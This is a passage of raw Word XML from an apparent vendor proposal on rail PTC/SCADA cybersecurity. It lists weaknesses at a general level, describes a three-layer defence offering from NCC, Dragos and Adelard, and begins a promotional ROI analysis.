      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserv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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Override: SCADA can disable safety</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Validation: No cryptographic checks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Logging: Can be modified post-fact</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Backup: Shares same vulnerabilities</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1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wgwywpa089sp" w:id="30"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Defensive Architecture Revolution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mjesjei6wa1m" w:id="31"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Tri-Partner Safety-Security Solution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[IMAGE: Revolutionary defense architecture on slate grey (#1A1F2E). Three-layer fortress design. Outer layer "NCC OTCE Assessment &amp; Architecture" - shows assessment teams, zero trust design, segmentation planning. Middle layer "Dragos Platform &amp; Monitoring" - displays protocol inspection, anomaly detection, threat hunting. Inner layer "Adelard Safety Validation" - illustrates SIL verification, fail-safe mechanisms, manual overrides. Show attacks being stopped at each layer. Include effectiveness metrics: 94% risk reduction, SIL-4 maintained, zero safety compromise.]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9ij8o84wjc0g" w:id="32"/>
      <w:bookmarkEnd w:id="32"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Layer 1: NCC OTCE - Architectural Transformation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001FD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Assessment Phase</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserv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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">500-point PTC-SCADA evaluation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000200">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack path modeling</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000201">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk quantification</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000202">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Regulatory gap analysis</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rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Design Phase</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Zero Trust rail architecture</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000207">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Protocol break implementation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000208">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Segmentation strategy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000209">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Migration planning</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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Implementation Support</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Minimal disruption approach</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Safety validation throughout</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000020F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Testing and verification</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000210">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Knowledge transfer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000211">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_t3fj5mxgnpai" w:id="33"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Layer 2: Dragos - Industrial Threat Detection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000212">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Platform Capabilities</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PTC protocol deep inspection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000215">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SCADA behavior analytics</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000216">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Integration point monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000217">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Asset inventory automation</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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Threat Intelligence</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Rail-specific threat feeds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CARBIDE group tracking</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability correlation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Playbook automation</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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Response Features</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Automated containment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000223">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Forensic capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000224">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Recovery procedures</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000225">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Compliance reporting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000226">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_o491fhw06m8k" w:id="34"/>
      <w:bookmarkEnd w:id="34"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Layer 3: Adelard - Safety Assurance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000227">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Safety Maintenance</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SIL-4 verification during changes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000022A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hazard analysis updates</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000022B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fail-safe validation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000022C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Emergency override testing</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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Integration Security</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Safety-security trade-offs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000231">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk assessment methodology</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000232">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Compliance documentation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000233">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Audit support</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1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ai0y4ncd1373" w:id="35"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ROI Analysis: The Business Case for Survival</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000237">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9lt6bdrvj5o7" w:id="36"/>
      <w:bookmarkEnd w:id="36"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Financial Modeling</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000238">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[IMAGE: Comprehensive financial dashboard on dark grey (#1A1F2E). Four quadrants: 1) Cost of Inaction showing exponential risk growth reaching $1.8B by year 3. 2) Investment Timeline showing $8.9M total over 3 years with monthly breakdown. 3) Risk Reduction waterfall from $1.8B to $180M (90% reduction). 4) ROI metrics displaying 1,130% ROI, 3.2 month payback, $152M NPV. Include industry comparisons showing 40% lower cost than alternatives.]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000239">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ep1chg5qw8nb" w:id="37"/>
      <w:bookmarkEnd w:id="37"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Investment Breakdown</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b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Year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b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
